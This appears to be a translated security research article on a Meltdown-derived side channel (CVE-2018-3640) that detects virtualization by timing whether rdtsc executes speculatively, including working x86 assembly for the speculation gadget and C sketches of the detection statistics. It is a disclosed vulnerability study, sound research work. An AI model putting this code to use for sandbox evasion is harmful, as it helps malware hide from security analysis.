A new attack technique based on Meltdown: using speculative execution to detect virtualization

The Meltdown attack opened up a new class of processor attacks that use microarchitectural state to transfer information. But speculative execution, first used for an attack in Meltdown, makes it possible not only to execute code that bypasses access restrictions, but also to learn certain details of how the processor operates. We found a new way to mount an attack using microarchitectural state. It detects virtualization based on whether or not the processor chooses to execute particular instructions speculatively. We reported this method to Intel, and on May 21, 2018, the security advisory "Q2 2018 Speculative Execution Side Channel Update" was released, which includes our vulnerability, CVE-2018-3640, also known as Spectre Variant 3a.

1. Introduction

The attack is based on a cache side channel similar to the one used in the Meltdown attack. Meltdown is known to use speculative execution to access memory that should not be accessible without special privileges. This is possible because the processor executes certain instructions ahead of time to speed up code execution. Meltdown arranges for data read during speculative execution to select a location in an attacker-controlled buffer, so that the attacker can use memory access time measurements as a side channel. The attack described here differs from Meltdown in that it does not use a cache access time threshold; instead, it picks the page with the lowest access time.

2. Virtualization

The VT-x technology in Intel processors allows the hypervisor to choose whether a VMEXIT (a context switch to the hypervisor) occurs when certain instructions, such as rdtsc, are executed. Most virtualization environments intercept rdtsc in their default configuration. This is the case, for example, for VirtualBox, VMware, Hyper-V, and Parallels (with both Apple's hypervisor and Parallels' own). Because a VMEXIT is effectively a context switch, instructions that trigger it take longer to execute than they would in a non-virtualized environment.

3. Attack

A buffer of several pages is allocated. Then, instead of speculatively accessing memory regions in order to obtain data, the rdtsc instruction is executed speculatively, and its result is used to access a particular part of the previously allocated buffer. Speculative execution touches only a specific part of the buffer, which makes it possible to distinguish speculative accesses from random noise. After the function containing the speculatively executed code returns, the number of the page with the lowest access time is added to the statistics. The entire buffer is then flushed from the cache. The functions used to trigger speculative execution and the memory access in 32-bit versions of Windows are shown below:

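    __declspec(naked) void herring()
    {
        // Helper that sets up the speculative execution window.
        __asm
        {
            // Zero xmm0, then run a chain of long-latency instructions
            // so that the new value of esp is resolved late.
            xorps xmm0, xmm0
            sqrtpd xmm0, xmm0
            sqrtpd xmm0, xmm0
            sqrtpd xmm0, xmm0
            sqrtpd xmm0, xmm0
            sqrtpd xmm0, xmm0
            sqrtpd xmm0, xmm0
            sqrtpd xmm0, xmm0
            sqrtpd xmm0, xmm0
            // eax = 0, but only available once the sqrtpd chain completes.
            movd eax, xmm0
            // Drop the return address pushed by "call herring", so that
            // ret architecturally returns to the caller of speculate.
            lea esp, [esp+eax+4]
            ret
        }
    }

    __declspec(naked) void __fastcall speculate(const char* detector)
    {
        __asm
        {
            // Serialize before rdtsc.
            mfence
            // __fastcall passes detector in ecx; keep it in esi.
            mov esi, ecx
            // Everything after this call runs only speculatively,
            // because herring never returns here architecturally.
            call herring
            rdtsc
            // Select one of pages 32..39 from the low bits of the timestamp.
            and eax, 7
            or eax, 32
            shl eax, 12
            // Touch the selected page of the detector buffer.
            movzx eax, byte ptr [esi+eax]
        }
    }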
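The index arithmetic at the end of speculate and the bookkeeping described above can be sketched in portable C. This is only an illustration, not the PoC: PAGE_SIZE, PAGE_COUNT, probe_offset, fastest_page and record_iteration are hypothetical names, the buffer size of 40 pages is an assumption derived from the "or eax, 32" mask, and the per-page access times are assumed to have been measured elsewhere.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE  4096u  /* matches "shl eax, 12" */
#define PAGE_COUNT 40u    /* assumption: pages 0..39, so that pages 32..39 exist */

/* Mirrors "and eax, 7 / or eax, 32 / shl eax, 12": the low three bits of
   the timestamp select one of the pages 32..39 of the detector buffer. */
uint32_t probe_offset(uint32_t tsc_low)
{
    return ((tsc_low & 7u) | 32u) * PAGE_SIZE;
}

/* Returns the index of the page with the lowest measured access time. */
size_t fastest_page(const uint64_t *access_time, size_t pages)
{
    assert(pages > 0);
    size_t best = 0;
    for (size_t i = 1; i < pages; ++i) {
        if (access_time[i] < access_time[best])
            best = i;
    }
    return best;
}

/* Adds the outcome of one iteration to the per-page statistics. */
void record_iteration(uint32_t histogram[PAGE_COUNT],
                      const uint64_t access_time[PAGE_COUNT])
{
    histogram[fastest_page(access_time, PAGE_COUNT)] += 1;
}
```

Because only pages 32..39 can be touched by the speculative access, a fastest page outside that range indicates that the access did not happen in that iteration.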

To mount the attack successfully, these steps must be repeated to obtain the distribution of cached pages. Perform as many repetitions as are needed to collect enough statistical data; 10,000 iterations were used in the test described here. Then the number of misses is counted, that is, the iterations in which the fastest page lay outside the selected memory region. In virtualized environments where rdtsc interception is enabled, the share of such misses is between 50 and 99 percent. On non-virtualized systems, it is less than one percent. This information is presented in the figure below (the darker the memory region, the more hits were recorded in it). In our tests, macOS, Ubuntu, Debian and Windows were used as non-virtualized systems, and Ubuntu, Debian and Windows were used as guest systems.
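The decision rule implied by these numbers can be sketched as follows, assuming a per-page histogram that counts how often each page had the lowest access time. The function names and the 25% threshold are assumptions chosen for illustration; the measurements above only establish that the miss rate is below 1% on bare metal and between 50% and 99% under rdtsc interception.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define FIRST_PROBE_PAGE 32u  /* pages reachable by the speculative access */
#define LAST_PROBE_PAGE  39u

/* Fraction of iterations in which the fastest page lay outside pages
   32..39, i.e. the speculative access left no trace in the cache. */
double miss_ratio(const uint32_t *histogram, size_t pages)
{
    assert(histogram != NULL);
    uint64_t total = 0, hits = 0;
    for (size_t i = 0; i < pages; ++i) {
        total += histogram[i];
        if (i >= FIRST_PROBE_PAGE && i <= LAST_PROBE_PAGE)
            hits += histogram[i];
    }
    if (total == 0)
        return 0.0;  /* no data collected: report no misses */
    return (double)(total - hits) / (double)total;
}

/* Assumed threshold placed between the two reported ranges. */
bool looks_virtualized(const uint32_t *histogram, size_t pages)
{
    return miss_ratio(histogram, pages) > 0.25;
}
```

Any threshold between the two observed ranges would separate them; a real detector would pick it from measurements on the target hardware.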

Distribution of cached pages in different environments

4. Description of the attack

The attack uses speculative execution of instructions to force the processor to reveal information about how rdtsc is executed. In a non-virtualized environment, rdtsc is executed by the processor itself, which simply returns a counter. In a virtualized environment where the "RDTSC exiting" bit is set in the primary processor-based VM-execution controls (whose allowed settings are reported by the MSR IA32_VMX_PROCBASED_CTLS), executing rdtsc is essentially a context switch, which takes far longer.

At the time the vulnerability was discovered, the publicly available documentation on the internals of Intel processors did not contain enough information to explain exactly what happens. We have two hypotheses: either the processor decides that rdtsc will take too long to execute and does not execute it until the execution flow actually reaches it, or no instruction that causes a VMEXIT is ever executed speculatively. In a non-virtualized environment, rdtsc and the instructions immediately following it are executed speculatively, but this does not happen in a virtualized environment.

5. Conclusions and directions for future research

The described attack uses a new cache-based technique derived from Meltdown to create a side channel which, instead of accessing privileged memory regions, reveals information about the processor's mode of operation. All known methods for detecting virtualization depend heavily on using the rdtsc instruction as a timer, which allows a smart hypervisor to defeat them by substituting the returned values. The attack described here can be countered in the same way, but with small changes to the code the hypervisor's substitution of time values can no longer affect the result. We may publish a PoC of that version later.
It can be concluded that in virtualized environments where rdtsc is intercepted, a variation of the described attack can detect the presence of virtualization, and where it is not intercepted, previously known methods can be used, for example measuring the speed of TLB accesses.

This attack makes it possible to detect virtualization easily and quickly in environments with standard settings, or in environments that intentionally intercept rdtsc in order to protect themselves from virtualization detection. The attack was successfully tested against a virtualized sandbox: the experts detected the sandbox without giving themselves away.

PoC code can be found at the link

Source: https://habr.com/ru/post/359110/
